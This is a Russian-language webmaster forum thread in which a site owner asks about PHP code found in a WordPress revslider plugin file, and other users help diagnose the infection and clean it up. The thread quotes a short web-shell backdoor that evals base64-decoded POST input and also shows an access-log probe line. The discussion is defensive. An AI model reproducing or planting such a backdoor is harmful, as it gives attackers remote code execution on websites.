- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
$s21 = base64_decode;
$s20 = _POST;
if(isset($_POST['n1c1ae6'])){
eval(base64_decode($_POST['n1c1ae6']));
}
На сайте нашел такой код. Каспер при попытке открыть ругается. Похоже на вирус.
Я если правильно понимаю это код
То тут происходит выполнение того, что посылается в переменной n1c1ae6.
Как найти что приходит сюда и из какого файла? И файл у меня на хостинге или нет?
приходит через ПОСТ запрос от пользователя - у вас нигде не отображается)))
Смотрите логи доступа
Как найти что приходит сюда и из какого файла? И файл у меня на хостинге или нет?
Сюда приходит из $_POST-запроса.
Всё что приходит - выполняется.
Чистить-сносить...
p.s. Создавать темы в правильном разделе
приходит через ПОСТ запрос от пользователя - у вас нигде не отображается)))
Смотрите логи доступа
что приходит через пост я и сам вижу. А с чего видно что от пользователя? а не из файла?
---------- Добавлено 25.12.2014 в 15:52 ----------
Сюда приходит из $_POST-запроса.
Всё что приходит - выполняется.
Чистить-сносить...
p.s. Создавать темы в правильном разделе
снесено, но надо ж дыру найти... Вот и пытаюсь узнать откуда ноги растут..
По поводу раздела - возможно и не правильно создал...
А с чего видно что от пользователя? а не из файла?
На это ответить смогут только логи доступа.
По поводу раздела - возможно и не правильно создал...
Да. Но уже исправлено ;)
[24/Dec/2014:23:47:56 +0300] "POST /wp-content/old/plugins/woocommerce-custom-tabs/advanced-custom-fields/code.php HTTP/1.0" 404 151 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
вот тут еще одно обращение к одному файлу, но нету его кода, тоже похоже вирус.
Поиск по сайту тоталом со словом n1c1ae6 ничего не дал. Тогда вывод - с постороннего ресурса посылают запрос или зашифровано
Проверьте скрипты сайта через aibolit. На хостинге есть какие то антивирусы? Проверить файлы через maldet , avg... В каком месте сайта нашли вирус?
wp-content/plugins/revslider/rs-plugin/assets/header.php
Поиск по сайту тоталом со словом n1c1ae6 ничего не дал. Тогда вывод - с постороннего ресурса посылают запрос или зашифровано
Не правильный вывод - нет взаимосвязи :) Не факт что нет виря, а сторонний ресурс или нет посылает ПОСТ тебе скажет ИП, который ты не показал строке лога (и показывать не нужно - просто сравни с ИП своего сервака).
Кроме того лучше получить само тело запроса. Оно тоже должно быть в логах, но для этого нужно повышать (или понижать - я не знаю как где будет правильно ;) ) уровень логирования
---------- Добавлено 25.12.2014 в 17:29 ----------
revslider
батенька, да он же больной. Ну т.е. его старые версии.
недавно у одного клиента так же была проблема с этим же плагином.. revslider. похоже плагин уязвим. спама еще небыло с сайта? Установите самую новую версию плагина и проверьте все плагины на сайте. Например в моем случае вирь был еще в wp-content/plugins/backupwordpress/assets/ файлы diff.php menu.php , антивирусы их не брали. проверьте файлы сайта на последние изменения
Уже не одна тема про этот слайдер была. И вообще, зачем он нужен? Я раньше тоже рвался поставить, но с точки зрения удобства он никаких плюсов не дает.